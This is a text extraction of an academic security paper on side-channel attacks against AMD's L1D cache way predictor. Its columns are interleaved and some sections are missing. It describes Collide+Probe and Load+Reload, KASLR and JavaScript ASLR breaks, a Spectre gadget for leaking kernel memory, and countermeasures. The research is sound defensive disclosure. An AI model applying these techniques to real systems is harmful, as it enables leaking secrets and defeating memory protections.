Take A Way: Exploring The Security Implications of AMD's Cache Way Predictors
Take A Way: Exploring The Security Implications of AMD's Cache Way Predictors
ABSTRACT 1 INTRODUCTION
To optimize the energy consumption and performance of their With caches, out-of-order execution, speculative execution, or si-
CPUs, AMD introduced a way predictor for the L1-data (L1D) cache multaneous multithreading (SMT), modern processors are equipped
to predict in which cache way a certain address is located. Conse- with numerous features optimizing the system’s throughput and
quently, only this way is accessed, significantly reducing the power power consumption. Despite their performance benefits, these op-
consumption of the processor. timizations are often not designed with a central focus on security
In this paper, we are the first to exploit the cache way predic- properties. Hence, microarchitectural attacks have exploited these
tor. We reverse-engineered AMD’s L1D cache way predictor in optimizations to undermine the system’s security.
microarchitectures from 2011 to 2019, resulting in two new attack Cache attacks on cryptographic algorithms were the first mi-
techniques. With Collide+Probe, an attacker can monitor a vic- croarchitectural attacks [12, 42, 59]. Osvik et al. [58] showed that
tim’s memory accesses without knowledge of physical addresses an attacker can observe the cache state at the granularity of a cache
or shared memory when time-sharing a logical core. With Load+ set using Prime+Probe. Yarom et al. [82] proposed Flush+Reload,
Reload, we exploit the way predictor to obtain highly-accurate a technique that can observe victim activity at a cache-line granu-
memory-access traces of victims on the same physical core. While larity. Both Prime+Probe and Flush+Reload are generic techniques
Load+Reload relies on shared memory, it does not invalidate the that allow implementing a variety of different attacks, e.g., on cryp-
cache line, allowing stealthier attacks that do not induce any last- tographic algorithms [12, 15, 50, 54, 59, 63, 66, 82, 84], web server
level-cache evictions. function calls [85], user input [31, 48, 83], and address layout [25].
We evaluate our new side channel in different attack scenarios. Flush+Reload requires shared memory between the attacker and
We demonstrate a covert channel with up to 588.9 kB/s, which we the victim. When attacking the last-level cache, Prime+Probe re-
also use in a Spectre attack to exfiltrate secret data from the kernel. quires it to be shared and inclusive. While some Intel processors
Furthermore, we present a key-recovery attack from a vulnerable do not have inclusive last-level caches anymore [81], AMD always
cryptographic implementation. We also show an entropy-reducing focused on non-inclusive or exclusive last-level caches [38]. With-
attack on ASLR of the kernel of a fully patched Linux system, the out inclusivity and shared memory, these attacks do not apply to
hypervisor, and our own address space from JavaScript. Finally, we AMD CPUs.
propose countermeasures in software and hardware mitigating the With the recent transient-execution attacks, adversaries can di-
presented attacks. rectly exfiltrate otherwise inaccessible data on the system [41, 49,
68, 74, 75]. However, AMD’s microarchitectures seem to be vul-
CCS CONCEPTS nerable to only a few of them [9, 17]. Consequently, AMD CPUs
• Security and privacy → Side-channel analysis and counter- do not require software mitigations with high performance penal-
measures; Operating systems security. ties. Additionally, with the performance improvements of the latest
microarchitectures, the share of AMD CPU’s used is currently in-
ACM Reference Format:
creasing in the cloud [10] and consumer desktops [34].
Moritz Lipp, Vedad Hadžić, Michael Schwarz, Arthur Perais, Clémentine
Since the Bulldozer microarchitecture [6], AMD uses an L1D
Maurice, and Daniel Gruss. 2020. Take A Way: Exploring the Security
Implications of AMD’s Cache Way Predictors. In Proceedings of the 15th cache way predictor in their processors. The predictor computes a
ACM Asia Conference on Computer and Communications Security (ASIA CCS µTag using an undocumented hash function on the virtual address.
’20), June 1–5, 2020, Taipei, Taiwan. ACM, New York, NY, USA, 13 pages. This µTag is used to look up the L1D cache way in a prediction
https://doi.org/10.1145/3320269.3384746 table. Hence, the CPU has to compare the cache tag in only one
way instead of all possible ways, reducing the power consumption.
Permission to make digital or hard copies of all or part of this work for personal or In this paper, we present the first attacks on cache way predictors.
classroom use is granted without fee provided that copies are not made or distributed
for profit or commercial advantage and that copies bear this notice and the full citation For this purpose, we reverse-engineered the undocumented hash
on the first page. Copyrights for components of this work owned by others than the function of AMD’s L1D cache way predictor in microarchitectures
author(s) must be honored. Abstracting with credit is permitted. To copy otherwise, or from 2001 up to 2019. We discovered two different hash functions
republish, to post on servers or to redistribute to lists, requires prior specific permission
and/or a fee. Request permissions from [email protected]. that have been implemented in AMD’s way predictors. Knowledge
ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan of these functions is the basis of our attack techniques. In the
© 2020 Copyright held by the owner/author(s). Publication rights licensed to ACM. first attack technique, Collide+Probe, we exploit µTag collisions of
ACM ISBN 978-1-4503-6750-9/20/06. . . $15.00
https://doi.org/10.1145/3320269.3384746
ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan Lipp, et al.
attack. It exploits that cache invalidations (e.g., from clflush) are than the rdtsc instruction on Intel CPUs. A counting thread con-
propagated to all physical processors installed in the same system. stantly increments a global variable used as a timestamp without
When reloading the data, as in Flush+Reload, they can distinguish relying on microarchitectural specifics and, thus, can also be used
the timing difference between a cache hit in a remote processor on AMD CPUs.
and a cache miss, which goes to DRAM.
The second type of access-driven attacks, called Prime+Probe [37, 2.4 Simultaneous Multithreading (SMT)
50, 59], does not rely on shared memory and is, thus, applicable to
Simultaneous Multithreading (SMT) allows optimizing the effi-
more restrictive environments. As the attacker has no shared cache
ciency of superscalar CPUs. SMT enables multiple independent
line with the victim, the clflush instruction cannot be used. Thus,
threads to run in parallel on the same physical core sharing the
the attacker has to access congruent addresses instead (cf. Evict+
same resources, e.g., execution units and buffers. This allows uti-
Reload). The granularity of the attack is coarser, i.e., an attacker only
lizing the available resources better, increasing the efficiency and
obtains information about the accessed cache set. Hence, this attack
throughput of the processor. While on an architectural level, the
is more susceptible to noise. In addition to the noise caused by other
threads are isolated from each other and cannot access data of other
processes, the replacement policy makes it hard to guarantee that
threads, on a microarchitectural level, the same physical resources
data is actually evicted from a cache set [29].
may be used. Intel introduced SMT as Hyperthreading in 2002. AMD
With the general development to switch from inclusive caches to
introduced 2-way SMT with the Zen microarchitecture in 2017.
non-inclusive caches, Intel introduced cache directories. Yan et al.
Recently, microarchitectural attacks also targeted different shared
[81] showed that the cache directory is still inclusive, and an at-
resources: the TLB [24], store buffer [16], execution ports [2, 13],
tacker can evict a cache directory entry of the victim to invalidate
fill-buffers [68, 75], and load ports [68, 75].
the corresponding cache line. This allows mounting Prime+Probe
and Evict+Reload attacks on the cache directory. They also ana-
lyzed whether the same attack works on AMD Piledriver and Zen 2.5 Way Prediction
processors and discovered that it does not, because these processors To look up a cache line in a set-associative cache, bits in the address
either do not use a directory or use a directory with high associa- determine in which set the cache line is located. With an n-way
tivity, preventing cross-core eviction either way. Thus, it remains cache, n possible entries need to be checked for a tag match. To
to be answered what types of eviction-based attacks are feasible on avoid wasting power for n comparisons leading to a single match,
AMD processors and on which microarchitectural structures. Inoue et al. [36] presented way prediction for set-associative caches.
Instead of checking all ways of the cache, a way is predicted, and
only this entry is checked for a tag match. As only one way is
2.3 High-resolution Timing activated, the power consumption is reduced. If the prediction is
For most cache attacks, the attacker requires a method to measure correct, the access has been completed, and access times similar to
timing differences in the range of a few CPU cycles. The rdtsc a direct-mapped cache are achieved. If the prediction is incorrect, a
instruction provides unprivileged access to a model-specific register normal associative check has to be performed.
returning the current cycle count and is commonly used for cache We only describe AMD’s way predictor [8, 23] in more detail
attacks on Intel CPUs. Using this instruction, an attacker can get in the following section. However, other CPU manufacturers hold
timestamps with a resolution between 1 and 3 cycles on modern patents for cache way prediction as well [56, 64]. CPU’s like the
CPUs. On AMD CPUs, this register has a cycle-accurate resolution Alpha 21264 [40] also implement way prediction to combine the
until the Zen microarchitecture. Since then, it has a significantly advantages of set-associative caches and the fast access time of a
lower resolution as it is only updated every 20 to 35 cycles (cf. direct-mapped cache.
Appendix A). Thus, rdtsc is only sufficient if the attacker can
repeat the measurement and use the average timing differences 3 REVERSE-ENGINEERING AMDS WAY
over all executions. If an attacker tries to monitor one-time events, PREDICTOR
the rdtsc instruction on AMD cannot directly be used to observe
In this section, we explain how to reverse-engineer the L1D way
timing differences, which are only a few CPU cycles.
predictor used in AMD CPUs since the Bulldozer microarchitecture.
The AMD Ryzen microarchitecture provides the Actual Perfor-
First, we explain how the AMD L1D way predictor predicts the
mance Frequency Clock Counter (APERF counter) [7] which can be
L1D cache way based on hashed virtual addresses. Second, we
used to improve the accuracy of the timestamp counter. However,
reverse-engineer the undocumented hash function used for the way
it can only be accessed in kernel mode. Although other timing
prediction in different microarchitectures. With the knowledge of
primitives provided by the kernel, such as get_monotonic_time,
the hash function and how the L1D way predictor works, we can
provide nanosecond resolution, they can be more noisy and still
then build powerful side-channel attacks exploiting AMD’s way
not sufficiently accurate to observe timing differences, which are
predictor.
only a few CPU cycles.
Hence, on more recent AMD CPUs, it is necessary to resort to a
different method for timing measurements. Lipp et al. [48] showed 3.1 Way Predictor
that counting threads can be used on ARM-based devices where Since the AMD Bulldozer microarchitecture, AMD uses a way pre-
unprivileged high-resolution timers are unavailable. Schwarz et al. dictor in the L1 data cache [6]. By predicting the cache way, the CPU
[66] showed that a counting thread can have a higher resolution only has to compare the cache tag in one way instead of all ways.
ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan Lipp, et al.
Way 1 Way n
Creating Sets. With the ability to detect conflicts, we can build
Set µ Tag ... µ Tag N sets representing the number of entries in the µTag table. First,
VA we create a pool v of virtual addresses, which all map to the same
cache set, i.e., where bits 6 to 11 of the virtual address are the same.
Hash
2,000
Non-colliding addresses
Hence, we extend the experiment in accessing addresses mapping
Measurements
1,500 Colliding addresses to all possible µTags on one hardware thread (and all possible cache
1,000 sets). While we repeatedly accessed one of these addresses on one
hardware thread, we measure the number of L1 misses to a single
500
virtual address on the sibling thread. However, we are not able to
0
observe any collisions and, thus, conclude that either individual
0 50 100 150 200
structures are used per thread or that they are shared but tagged for
Access time (increments)
each thread. The only exceptions are aliased loads as the hardware
updates the µTag in the aliased way (see Section 3.1).
Figure 2: Measured duration of 250 alternating accesses to In another experiment, we measure access times of two virtual
addresses with and without the same µTag. addresses that are mapped to the same physical address. As docu-
mented [8], loads to an aliased address see an L1D cache miss and,
f1 thus, load the data from the L2 data cache. While we verified this
f2
f3
behavior, we additionally observed that this is also the case if the
... 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 ...
other thread performs the other load. Hence, the structure used is
f4
searched by the sibling thread, suggesting a competitively shared
f5 structure that is tagged with the hardware threads.
f6
f7
f8
4 USING THE WAY PREDICTOR FOR SIDE
(a) Zen, Zen+, Zen 2 CHANNELS
f1
f2
In this section, we present two novel side channels that leverage
f3 AMD’s L1D cache way predictor. With Collide+Probe, we moni-
f4
f5 tor memory accesses of a victim’s process without requiring the
f6
f7 knowledge of physical addresses. With Load+Reload, while relying
f8
on shared memory similar to Flush+Reload, we can monitor mem-
... ...
27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12
ory accesses of a victim’s process running on the sibling hardware
thread without invalidating the targeted cache line from the entire
(b) Bulldozer, Piledriver, Steamroller cache hierarchy.
cache line with address v, the attacker observes an L1D cache miss Table 1: Tested CPUs with their microarchitecture (µ-arch.)
and loads the data from the L2 cache, resulting in a higher access and whether they have a way predictor (WP).
time. Otherwise, if the victim has not accessed the cache line with
address v, it is still accessible in the L1D cache for the attacker and, Setup CPU µ-arch. WP
thus, a lower access time is measured. By distinguishing between
Lab AMD Athlon 64 X2 3800+ K8 ✗
both cases, the attacker can deduce whether the victim has accessed
Lab AMD Turion II Neo N40L K10 ✗
the address v. Lab AMD Phenom II X6 1055T K10 ✗
Comparison with Flush+Reload. While Flush+Reload invalidates a Lab AMD E-450 Bobcat ✗
Lab AMD Athlon 5350 Jaguar ✗
cache line from the entire cache hierarchy, Load+Reload only evicts
Lab AMD FX-4100 Bulldozer ✓
the data for the sibling thread from the L1D. Thus, Load+Reload is
Lab AMD FX-8350 Piledriver ✓
limited to cross-thread scenarios, while Flush+Reload is applicable
Lab AMD A10-7870K Steamroller ✓
to cross-core scenarios too. Lab AMD Ryzen Threadripper 1920X Zen ✓
Lab AMD Ryzen Threadripper 1950X Zen ✓
5 CASE STUDIES Lab AMD Ryzen Threadripper 1700X Zen ✓
To demonstrate the impact of the side channel introduced by the Lab AMD Ryzen Threadripper 2970WX Zen+ ✓
µTag, we implement different attack scenarios. In Section 5.1, we Lab AMD Ryzen 7 3700X Zen 2 ✓
implement a covert channel between two processes with a transmis- Cloud AMD EPYC 7401p Zen ✓
sion rate of up to 588.9 kB/s outperforming state-of-the-art covert Cloud AMD EPYC 7571 Zen ✓
channels. In Section 5.2, we break kernel ASLR, demonstrate how
user-space ASLR can be weakened, and reduce the ASLR entropy
of the hypervisor in a virtual-machine setting. In Section 5.3, we
use Collide+Probe as a covert channel to extract secret data from To encode a 1-bit to transmit, the sender accesses address v S .
the kernel in a Spectre attack. In Section 5.4, we recover secret keys To transmit a 0-bit, the sender does not access address v S . The
in AES T-table implementations. receiving end decodes the transmitted information by measuring
the access time when loading address v R . If the sender has accessed
Timing Measurement. As explained in Section 2.3, we cannot rely address v S to transmit a 1, the collision caused by the same µTag
on the rdtsc instruction for high-resolution timestamps on AMD of v S and v R results in a slow access time for the receiver. If the
CPUs since the Zen microarchitecture. As we use recent AMD sender has not accessed address v S , no collision caused the address
CPUs for our evaluation, we use a counting thread (cf. Section 2.3) v R to be evicted from L1D and, thus, the access time is fast. This
running on the sibling logical CPU core for most of our experiments timing difference allows the receiver to decode the transmitted bit.
if applicable. In other cases, e.g., a covert channel scenario, the Different cache-based covert channels use the same side chan-
counting thread runs on a different physical CPU core. nel to transmit multiple bits at once. For instance, different cache
lines [30, 48] or different cache sets [48, 53] are used to encode
Environment. We evaluate our attacks on different environments
one bit of information on its own. We extended the described µTag
listed in Table 1, with CPUs from K8 (released 2013) to Zen 2 (re-
covert channel to transmit multiple bits in parallel by utilizing mul-
leased in 2019). We have reverse-engineered 2 unique hash func-
tiple cache sets. Instead of decoding the transmitted bit based on
tions, as described in Section 3. One is the same for all Zen microar-
the timing difference of one address, we use two addresses in two
chitectures, and the other is the same for all previous microarchi-
cache sets for every bit we transmit: One to represent a 1-bit and
tectures with a way predictor.
the other to represent the 0-bit. As the L1D has 64 cache sets, we
can transmit up to 32 bit in parallel without reusing cache sets.
5.1 Covert Channel
A covert channel is a communication channel between two parties Performance Evaluation. We evaluated the transmission and er-
that are not allowed to communicate with each other. Such a covert ror rate of our covert channel in a local setting and a cloud set-
channel can be established by leveraging a side channel. The µTag ting by sending and receiving a randomly generated data blob. We
used by AMD’s L1D way prediction enables a covert channel for achieved a maximum transmission rate of 588.9 kB/s (σx̄ = 0.544,
two processes accessing addresses with the same µTag. n = 1000) using 80 channels in parallel on the AMD Ryzen Thread-
For the most simplistic form of the covert channel, two processes ripper 1920X. On the AMD EPYC 7571 in the Amazon EC2 cloud, we
agree on a µTag and a cache set (i.e., the least-significant 12 bits of achieved a maximum transmission rate of 544.0 kB/s (σx̄ = 0.548,
the virtual addresses are the same). This µTag is used for sending n = 1000) also using 80 channels. In contrast, L1 Prime+Probe
and receiving data by inducing and measuring cache misses. achieved a transmission rate of 400 kB/s [59] and Flush+Flush a
In the initialization phase, both parties allocate their own page. transmission rate of 496 kB/s [30]. As illustrated in Figure 4, the
The sender chooses a virtual address v S , and the receiver chooses mean transmission rate increases with the number of bits sent in
a virtual address v R that fulfills the aforementioned requirements, parallel. However, the error rate increases drastically when trans-
i.e., v S and v R are in the same cache set and yield the same µTag. mitting more than 64 bits in parallel, as illustrated in Figure 6. As
The µTag can simply be computed using the reverse-engineered the number of available different cache sets for our channel is
hash function of Section 3. exhausted for our covert channel, sending more bits in parallel
ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan Lipp, et al.
400
Target Entropy Bits Reduced Success Rate Timing Source Time
would reuse already used sets. This increases the chance of wrong mapping functions (Section 3.2) to infer bits of the addresses. We
measurements and, thus, the error rate. show an additional attack on heap ASLR in Appendix C.
Error Correction. As accesses to unrelated addresses with the same
µTag as our covert channel introduce noise in our measurements, 5.2.1 Kernel. On modern Linux systems, the position of the kernel
an attacker can use error correction to achieve better transmission. text segment is randomized inside the 1 GB area from 0xffff ffff
Using hamming codes [33], we introduce n additional parity bits 8000 0000 - 0xffff ffff c000 0000 [39, 46]. As the kernel image
allowing us to detect and correct wrongly measured bits of a packet is mapped using 2 MB pages, it can only be mapped in 512 different
with a size of 2n − 1 bits. For our covert channel, we implemented locations, resulting in 9 bit of entropy [65].
different Hamming codes H (m, n) that encode n bits by adding Global variables are stored in the .bss and .data sections of
m − n parity bits. The receiving end of the covert channel computes the kernel image. Since 2 MB physical pages are used, the 21 lower
the parity bits from the received data and compares it with the address bits of a global variable are identical to the lower 21 bits
received parity bits. Naturally, they only differ if a transmission of the offset within the the kernel image section. Typically, the
error occurred. The erroneous bit position can be computed, and kernel image is public and does not differ among users with the
the bit error corrected by flipping the bit. This allows to detect up same operating system. With the knowledge of the µTag from the
to 2-bit errors and correct one-bit errors for a single transmission. address of a global variable, one can compute the address bits 21 to
We evaluated different hamming codes on an AMD Ryzen Thread- 27 using the hash function of AMD’s L1D cache way predictor.
ripper 1920X, as illustrated in Figure 7 in Appendix B. When sending To defeat KASLR using Collide+Probe, the attacker needs to
data through 60 parallel channels, the H (7, 4) code reduces the error know the offset of a global variable within the kernel image that is
rate to 0.14 % (σx̄ = 0.08, n = 1000), whereas the H (15, 11) code accessed by the kernel on a user-triggerable event, e.g., a system
achieves an error rate of 0.16 % (σx̄ = 0.08, n = 1000). While the call or an interrupt. While not many system calls access global
H (7, 4) code is slightly more robust [33], the H (15, 11) code achieves variables, we found that the SYS_time system call returns the value
a better transmission rate of 452.2 kB/s (σx̄ = 7.79, n = 1000). of the global second counter obj.xtime_sec. Using Collide+Probe,
More robust protocols have been used in cache-based covert the attacker accesses an address v ′ with a specific µTag µv ′ and
channels in the past [48, 53] to achieve error-free communication. schedules the system call, which accesses the global variable with
While these techniques can be applied to our covert channel as well, address v and µTag µv . Upon returning from the kernel, the attacker
we leave it up to future work. probes the µTag µv ′ using address v ′ . On a conflict, the attacker
infers that the address v ′ has the same µTag, i.e., t = µv ′ = µv .
Limitations. As we are not able to observe µTag collisions be- Otherwise, the attacker chooses another address v ′ with a different
tween two processes running on sibling threads on one physical µTag µv ′ and repeats the process. As the µTag bits t 0 to t 7 are known,
core, our covert channel is limited to processes running on the same the address bits v 20 to v 27 can be computed from address bits v 12
logical core. to v 19 based on the way predictor’s hash functions (Section 3.2).
Following this approach, we can compute address bits 21 to 27 of
5.2 Breaking ASLR and KASLR the global variable. As we know the offset of the global variable
To exploit a memory corruption vulnerability, an attacker often inside the kernel image, we can also recover the start address of the
requires knowledge of the location of specific data in memory. kernel image mapping, leaving only bits 28 and 29 unknown. As
With address space layout randomization (ASLR), a basic memory the kernel is only randomized once per boot, the reduction to only
protection mechanism has been developed that randomizes the 4 address possibilities gives an attacker a significant advantage.
locations of memory sections to impede the exploitation of these For the evaluation, we tested 10 different randomization offsets
bugs. ASLR is not only applied to user-space applications but also on a Linux 4.15.0-58 kernel with an AMD Ryzen Threadripper 1920X
implemented in the kernel (KASLR), randomizing the offsets of processor. We ran our experiment 1000 times for each randomiza-
code, data, and modules on every boot. tion offset. With a success rate of 98.5 %, we were able to reduce the
In this section, we exploit the relation between virtual addresses entropy of KASLR on average in 0.51 ms (σ = 12.12 µs, n = 10 000).
and µTags to reduce the entropy of ASLR in different scenarios. While there are several microarchitectural KASLR breaks, this
With Collide+Probe, we can determine the µTags accessed by the is to the best of our knowledge the first which reportedly works
victim, e.g., the kernel or the browser, and use the reverse-engineered on AMD and not only on Intel CPUs. Hund et al. [35] measured
Take A Way: Exploring the Security Implications of AMD’s Cache Way Predictors ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan
differences in the runtime of page faults when repeatedly access- is located. As the equation system is very small, an attacker can
ing either valid or invalid kernel addresses on Intel CPUs. Bar- trivially solve it in JavaScript.
resi et al. [11] exploited page deduplication to break ASLR: a copy- However, to distinguish between colliding and non-colliding ad-
on-write pagefault only occurs for the page with the correctly dresses, we require a high-precision timer in JavaScript. While
guessed address. Gruss et al. [28] exploited runtime differences in the performance.now() function only returns rounded results
the prefetch instruction on Intel CPUs to detect mapped kernel for security reasons [3, 14], we leverage an alternative timing
pages. Jang et al. [39] showed that the difference in access time to source [25, 69]. For our evaluation, we used the technique of a count-
valid and invalid kernel addresses can be measured when suppress- ing thread constantly incrementing a shared variable [25, 48, 69, 80].
ing exceptions with Intel TSX. Evtyushkin et al. [22] exploited the We tested our proof-of-concept in both the Chrome 76.0.3809
branch-target buffer on Intel CPUs to gain information on mapped and Firefox 68.0.2 web browsers as well as the Chrome V8 stan-
pages. Schwarz et al. [65] showed that the store-to-load forwarding dalone engine. In Firefox, we are able to reduce the entropy by
logic on Intel CPUs is missing a permission check which allows 15 bits with a success rate of 98 % and an average run time of 2.33 s
to detect whether any virtual address is valid. Canella et al. [16] (σ = 0.03 s, n = 1000). With Chrome, we can correctly reduce the
exploited that recent stores can be leaked from the store buffer on bits with a success rate of 86.1 % and an average run time of 2.90 s
vulnerable Intel CPUs, allowing to detect valid kernel addresses. (σ = 0.25 s, n = 1000). As the JavaScript standard does not provide
any functionality to retrieve the addresses used by variables, we
5.2.2 Hypervisor. The Kernel-based Virtual Machine (KVM) is a extended the capabilities of the Chrome V8 engine to verify our re-
virtualization module that allows the Linux kernel to act as a hyper- sults. We introduced several custom JavaScript functions, including
visor to run multiple, isolated environments in parallel called virtual one that returned the virtual address of an array. This provided us
machines or guests. Virtual machines can communicate with the with the ground truth to verify that our proof-of-concept recovered
hypervisor using hypercalls with the privileged vmcall instruction. the address bits correctly. Inside the extended Chrome V8 engine,
In the past, collisions in the branch target buffer (BTB) have been we were able to recover the address bits with a success rate of 100 %
used to break hypervisor ASLR [22, 78]. and an average run time of 1.14 s (σ = 0.03 s, n = 1000).
In this scenario, we leak the base address of the KVM kernel
module from a guest virtual machine. We issue hypercalls with 5.3 Leaking Kernel Memory
invalid call numbers and monitor, which µTags have been accessed In this section, we combine Spectre with Collide+Probe to leak
using Collide+Probe. In our evaluation, we identified two cache sets kernel memory without the requirement of shared memory. While
enabling us to weaken ASLR of the kvm and the kvm_amd module some Spectre-type attacks use AVX [70] or port contention [13],
with a success rate of 98.8 % and an average runtime of 0.14 s (σ = most attacks use the cache as a covert channel to encode secrets [17,
1.74 ms, n = 1000). We verified our results by comparing the leaked 41]. During transient execution, the kernel caches a user-space ad-
address bits with the symbol table (/proc/kallsyms). dress based on a secret. By monitoring the presence of said address
Another target is the user-space virtualization manager, e.g., in the cache, the attacker can deduce the leaked value.
QEMU. Guest operating systems can interact with virtualization As AMD CPU’s are not vulnerable to Meltdown [49], stronger
managers through various methods, e.g., the out instruction. Like- kernel isolation [27] is not enforced on modern operating systems,
wise to the previously described hypercall method, a guest virtual leaving the kernel mapped in user space. However, with SMAP
machine can use this method to trigger the managing user pro- enabled, the processor never loads an address into the cache if the
cess to interact with the guest memory from its own address space. translation triggers a SMAP violation, i.e., the kernel tries to access
By using Collide+Probe in this scenario, we were able to reduce a user-space address [9]. Thus, an attacker has to find a vulnerable
the ASLR entropy by 16 bits with a success rate of 90.0 % with an indirect branch that can access user-space memory. We lift this
average run time of 2.88 s (σ = 3.16 s, n = 1000). restriction by using Collide+Probe as a cache-based covert channel
to infer secret values accessed by the kernel. With Collide+Probe,
5.2.3 JavaScript. In this section, we show that Collide+Probe is we can observe µTag collisions based on the secret value that is
not only restricted to native environments. We use Collide+Probe leaked and, thus, remove the requirement of shared memory, i.e.,
to break ASLR from JavaScript within Chrome and Firefox. As the user memory that is directly accessible to the kernel.
JavaScript standard does not define a way to retrieve any address in- To evaluate Collide+Probe as a covert channel for a Spectre-
formation, side channels in browsers have been used in the past [57], type attack, we implement a custom kernel module containing a
also to break ASLR, simplifying browser exploitation [25, 65]. Spectre-PHT gadget as illustrated as follows:
The idea of our ASLR break is similar to the approach of reverse-
1 if (index < bounds) { a = LUT[data[index] * 4096]; }
engineering the way predictor’s mapping function, as described
in Section 3.2. First, we allocate a large chunk of memory as a The execution of the presented code snippet can be triggered
JavaScript typed array. If the requested array length is big enough, with an ioctl command that allows the user to control the in-
the execution engine allocates it using mmap, placing the array at dex variable as it is passed as an argument. First, we mistrain the
the beginning of a memory page [29, 69]. This allows using the branch predictor by repeatedly providing an index that is in bounds,
indices within the array as virtual addresses with an additional letting the processor follow the branch to access a fixed kernel-
constant offset. By accessing pairs of addresses, we can find µTag memory location. Then, we access an address that collides with the
collisions allowing us to build an equation system where the only kernel address accessed based on a possible byte-value located at
unknown bits are the bits of the address where the start of the array data[index]. By providing an out-of-bounds index, the processor
ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan Lipp, et al.
0x186800 0x186800
now speculatively accesses a memory location based on the secret
99 94 94 94 93 93 92 92 92 94 95 92 92 92 93 94 195 177 181 180 183 180 185 179 170 181 177 176 175 178 173 175
0x186840 93 100 90 91 93 88 93 91 91 90 92 91 88 93 89 91 0x186840 179 197 180 174 180 177 177 177 176 172 166 170 177 183 167 180
0x186880 0x186880
data located at the out-of-bounds index. Using Collide+Probe, we
94 87 100 92 95 97 95 92 89 93 93 92 95 87 90 97 179 182 196 176 181 185 180 166 172 177 175 182 188 169 183 171
0x1868c0 96 93 93 100 94 90 93 92 94 95 90 91 94 92 90 89 0x1868c0 180 182 176 194 178 178 174 167 182 175 182 174 177 174 178 174
0x186900 0x186900
can now detect if the kernel has accessed the address based on
94 90 92 88 100 90 93 88 94 91 87 96 90 88 90 91 184 182 184 177 193 186 180 173 177 176 171 181 182 184 161 172
0x186940 91 90 91 95 89 100 86 91 90 95 93 95 94 93 96 89 0x186940 175 178 174 172 181 196 183 179 182 182 175 176 179 182 172 182
0x186980 0x186980
the assumed secret byte value. By repeating this step for each of
94 88 95 95 94 88 100 88 93 89 91 82 90 91 87 91 176 181 179 171 178 175 189 164 177 176 172 175 174 164 177 183
Address
Address
0x1869c0 93 98 91 88 91 89 94 99 87 85 94 91 96 93 90 92 0x1869c0 175 171 179 172 172 182 173 196 180 174 189 179 182 169 179 175
0x186a00 0x186a00
the 256 possible byte values, we can deduce the actual byte as we
95 91 89 89 90 93 91 92 100 89 91 92 89 90 92 88 179 177 170 168 180 174 178 179 189 182 178 186 179 179 179 182
0x186a40 95 89 96 90 92 91 96 89 90 100 91 90 91 92 92 88 0x186a40 185 185 169 178 165 177 169 167 174 197 171 177 184 174 171 172
0x186a80 0x186a80
observe µTag conflicts. As we cannot ensure that the processor
95 94 88 91 95 91 91 92 93 88 100 94 95 93 92 93 176 180 171 169 178 182 178 177 182 183 195 166 172 182 175 178
0x186ac0 93 93 94 91 90 93 92 94 92 96 90 100 92 91 90 88 0x186ac0 168 185 179 171 177 173 189 179 190 185 182 195 175 178 186 184
0x186b00 0x186b00
always misspeculates when providing the out-of-bounds index, we
90 95 92 94 90 91 90 90 96 97 92 94 100 91 93 88 171 177 180 173 179 176 174 180 176 184 169 178 195 179 172 169
0x186b40 91 87 91 89 88 93 93 94 87 95 95 91 89 100 87 93 0x186b40 178 187 172 164 171 180 178 180 173 174 183 175 181 196 175 174
0x186b80 0x186b80
run this attack multiple times for each byte we want to leak.
96 93 91 90 94 93 94 90 89 97 95 94 92 95 100 97 185 173 179 175 179 182 182 175 178 177 172 170 176 178 185 187
0x186bc0 88 92 93 96 91 97 89 94 95 84 92 98 91 97 90 100 0x186bc0 179 180 181 180 174 180 179 175 182 181 172 179 181 170 176 186
7 COUNTERMEASURES data n times, such that the data is accessible via n different virtual
In this section, we discuss mitigations to the presented attacks on addresses, which all have a different µTag. When accessing the data,
AMD’s way predictor. We first discuss hardware-only mitigations, a random address is chosen out of the n possible addresses. The at-
followed by mitigations requiring hardware and software changes, tacker cannot learn which T-table has been accessed by monitoring
as well as a software-only solution. the accessed µTags, as a uniform distribution over all possibilities
will be observed. This technique is not restricted to T-table imple-
Temporarily Disable Way Predictor. One solution lies in designing mentations but can be applied to virtually any secret-dependent
the processor in a way that allows temporarily disabling the way memory access within an application. With dynamic software di-
predictor temporarily. Alves et al. [4] evaluated the performance versity [19], diversified replicas of program parts are generated
impact penalty of instruction replays caused by mispredictions. By automatically to thwart cache-side channel attacks.
dynamically disabling way prediction, they observe a higher perfor-
mance than with standard way prediction. Dynamically disabling 8 CONCLUSION
way prediction can also be used to prevent attacks by disabling
it if too many mispredictions within a defined time window are The key takeaway of this paper is that AMD’s cache way predictors
detected. If an adversary tries to exploit the way predictor or if leak secret information. To understand the implementation details,
the current legitimate workload provokes too many conflicts, the we reverse engineered AMD’s L1D cache way predictor, leading
processor deactivates the way predictor and falls back to compar- to two novel side-channel attack techniques. First, Collide+Probe
ing the tags from all ways. However, it is unknown whether AMD allows monitoring memory accesses on the current logical core
processors support this in hardware, and there is no documented without the knowledge of physical addresses or shared memory.
operating system interface to it. Second, Load+Reload obtains accurate memory-access traces of
applications co-located on the same physical core.
Keyed Hash Function. The currently used mapping functions (Sec- We evaluated our new attack techniques in different scenarios.
tion 3) rely solely on bits of the virtual address. This allows an We established a high-speed covert channel and utilized it in a
attacker to reverse-engineer the used function once and easily find Spectre attack to leak secret data from the kernel. Furthermore,
colliding virtual addresses resulting in the same µTag. By keying the we reduced the entropy of different ASLR implementations from
mapping function with an additional process- or context-dependent native code and sandboxed JavaScript. Finally, we recovered a key
secret input, a reverse-engineered hash function is only valid for the from a vulnerable AES implementation.
attacker process. ScatterCache [77] and CEASAR-S [61] are novel Our attacks demonstrate that AMD’s design is vulnerable to side-
cache designs preventing cache attacks by introducing a similar channel attacks. However, we propose countermeasures in software
keyed mapping function for skewed-associative caches. Hence, we and hardware, allowing to secure existing implementations and
expect that such methods are also effective when used for the way future designs of way predictors.
predictor. Moreover, the key can be updated regularly, e.g., when
returning from the kernel, and, thus, not remain the same over the ACKNOWLEDGMENTS
execution time of the program.
We thank our anonymous reviewers for their comments and sugges-
State Flushing. With Collide+Probe, an attacker cannot monitor tions that helped improving the paper. The project was supported
